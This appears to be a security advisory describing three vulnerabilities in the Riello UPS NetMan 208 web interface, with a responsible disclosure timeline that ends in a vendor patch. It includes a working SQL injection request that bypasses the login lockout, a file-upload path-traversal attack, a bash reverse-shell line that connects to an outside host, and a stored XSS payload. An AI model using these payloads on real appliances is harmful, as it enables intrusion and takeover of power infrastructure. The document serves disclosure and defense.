Share
## https://sploitus.com/exploit?id=E2D42485-FB1D-5C66-AA1D-ADCC746DA8CA
# Riello UPS with NetMan 208 - Vulnerability Disclosure

During a client engagement, we identified the presence of a [Riello UPS](https://www.riello-ups.it) appliance within the target environment.

Without prior knowledge of its internal architecture or credentials, we conducted a series of black-box tests to assess potential exposure and evaluate the appliance’s resilience against unauthorized access and common attack vectors. Then, we downloaded the firmware from the vendor’s website to conduct further tests. The analysis led to the identification of some vulnerabilities which may allow an attacker to exploit specific weaknesses in the appliance’s security mechanisms that would like to disclosure following the responsible disclosure process.

In the following section, we present the test environment we set up and the technical details of the vulnerabilities we found.

## Table of contents

 * [1. Environment](#1-environment)
 * [2. Technical details](#2-technical-details)
   * [2.1. Unauthenticated SQL Injection](#21-unauthenticated-sql-injection)
   * [2.2. Remote Command Execution via Arbitrary File Upload](#22-remote-command-execution-via-arbitrary-file-upload)
   * [2.3. Stored Cross-Site Scripting (XSS)](#23-stored-cross-site-scripting-xss)
 * [3. Disclosure](#3-disclosure)

## 1. Environment
In order to validate the finding in a controlled and reproducible manner, we performed a secondary assessment on the software executed on the appliance, deployed on a dedicated virtualized environment. This allowed us to confirm the issue independently of the production environment and rule out any context-specific variables.

Specifically, a docker container was prepared with NetMan application, obtained extracting the downloaded image from Riello UPS [Netman 208](https://www.riello-ups.it/downloads/92-netman-208). The base image used is the latest Ubuntu and the JDK installed was the `zulu11.80.21-ca-jdk11.0.27`. The NetMan software was executed as root user.

With this setup we can suppose that the Riello UPS with NetMan 208 vulnerable version are:

| component                    | version      |
| :--------------------------- | :----------- |
| NetMan 208 Operating System: | Version 1.5  |
| NetMan 208 Application:      | Version 1.11 |
| NetMan 208 JVM:              | Version 1.0  |

## 2. Technical details

### 2.1. Unauthenticated SQL Injection

A SQL Injection exists in Riello UPS with NetMan 208 due to improper validation of user supplied input in username field in `/cgi-bin/login.cgi`. This makes it possible for unauthenticated attackers to make stacked queries in `LOGINFAILEDTABLE` table to bypass brute-force protection in "standard" login (e.g. no LDAP).

#### Description
Exploiting a SQL Injection in the login workflow we were able to delete the `LOGINFAILEDTABLE` table content allowing to avoid the rate limit protection against brute-force attack. The following is the HTTP request used in the proof-of-concept:

```
POST /cgi-bin/login.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 94
Connection: keep-alive

logintype=standard&username=admin';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- &password=bbbbbb

```

Detailed description
Trying to login several times with wrong credentials, the application locks the account providing the user the message "*Please wait before try again*".

![Brute-force block](/img/1-SQLi-brute-force-blocking.png)
 
The analysis highlighted that the `username` parameter is vulnerable to SQL Injection. It is possible to exploit it with stacked queries to delete all entries in the `LOGINFAILEDTABLE` table with the payload `’;DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- `. With the *admin* user, for example, the request payload can be:

```
logintype=standard&username=admin’;DELETE FROM LOGINFAILEDTABLE WHERE 1=1; --&password=try
```

As it is possible to see in the following evidence, the first response is again "*Please wait before try again*" but the database is now empty.

![Brute-force bypass](/img/1-SQLi-brute-force-bypass.png)
 
By trying to login again with a valid username the check on the user lock does not apply allowing the user to make the attempt.
The request with the SQL Injection payload and the normal login can be alternated to avoid brute-force protection.
It is also possible to automate this attack by adding the SQL Injection to empty the table after some attempts (for example 3) to bypass the brute-force protection.

### 2.2. Remote Command Execution via Arbitrary File Upload

An arbitrary file upload exists in Riello UPS with NetMan 208, specifically in `/cgi-bin/certsupload.cgi`. This vulnerability allows authenticated attackers to achieve remote code execution by uploading malicious files.

#### Description

Exploiting an arbitrary file upload on the certificate upload feature as an admin user, it’s possible to overwrite existing resources on the server file system. An attacker can overwrite an existing CGI file that will be executed as soon as the script is accessed.
Detailed description

When an admin user uploads a certificate file, the web application appears to utilize the raw, user-provided filename to save it locally on the file system. This is vulnerable to path traversal and arbitrary file write and allows an attacker to overwrite files within the file system by specifying the full path as the filename.
In this scenario, we were able to modify the contents of the `/cgi-bin/runin.cgi` file to execute the following arbitrary commands:

```bash
echo ā€œexecution codeā€
echo ā€œ$idā€
```

As you can see in the following screenshot:

![Send RCE payload](/img/2-RCE-send-payload.png)

Calling `/cgi-bin/runin.cgi` it execute the payload:

![RCE payload execution](/img/2-RCE-payload-execution.png)
 
In a real scenario a potential attacker could execute more complex commands, such as a bash reverse shell which gets executed upon calling the file. This could lead to a complete compromise of the system leading to a remote code execution.

So, as proof of concept, we try to write the following reverse shell code:

```bash
bash -i >& /dev/tcp/172.17.0.1/4444 0>&1 &
```

As per the following screenshot:

![Send reverse shell payload](/img/2-RCE-send-reverse-shell-payload.png)
 
And we gain a remote shell on NetMan 208:

![Reverse shell payload execution](/img/2-RCE-reverse-shell-payload-execution.png)

### 2.3. Stored Cross-Site Scripting (XSS)

A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Riello UPS with NetMan 208 due to improper validation of user supplied input in `/cgi-bin/loginbanner_w.cgi`. An authenticated attacker can inject malicious script into pre/post login banner title and message that will be executed when viewed by anyone going to the home page.

#### Description

The login banner functionality allows you to inject JavaScript payload into the banners; the payload will be executed by the user that accesses the page with the embedded banners (for example on the login page).

Detailed description
Authenticated administrative users can modify the various banners, such as the `pre-login banner`, and `post-login banner`. During the edit no input sanitization mechanism was identified. Since no limitation on the HTML tags has been detected it’s also possible to embed any tag. If an administrator changes the banner to include JavaScript code enclosed in the `` tag, then it’s executed in the victim browser.

For example, if you modify the `pre_login_banner_title` POST field in `/cgi-bin/loginbanner_w.cgi` with a basic Cross-Site Scripting payload like this one:

```html
alert('xss')
```

As you can see in following request:

![Send Cross-Site Scripting (XSS) payload](/img/3-XSS-send-payload.png)

The script is executed by the browser of who visit the Rello UPS NetMan 208 login page.

![Cross-Site Scripting payload execution](/img/3-XSS-payload-execution.png)

Other vulnerable fields in this request are: `pre_login_banner_message`, `pre_login_banner_message`, `post_login_admin_banner_title`, `post_login_admin_banner_message`, `post_login_power_banner_title`, `post_login_power_banner_message`, `post_login_view_banner_title`, `post_login_view_banner_message`.

> Please note that even if this issue is exploitable as admin user, **the session cookie has no HttpOnly flag** set and the XSS could be used to obtain other users (viewer/power) cookies.

## 3. Disclosure

We’ve decided to follow the industry standard 90+30 days responsible disclosure process; here’s the timeline:

 - **November 11, 2025**: Sent initial report to Riello’s security team (security-incident@riello-ups.com) with full technical details and PoC exploits. All compiled according to their [Vulnerability Disclosure Policy](https://www.riello-ups.it/pages/177-vulnerability-disclosure).
 - **November 14, 2025**: Riello confirms they’ve succesfully replicate the vulnerabilities and sets the timeline for the remediation patch to three-four weeks.
 - **December 23, 2025**: Riello publish a new APP release (**1.12**) available on [Driver & Download page](https://www.riello-ups.it/downloads/92-netman-208).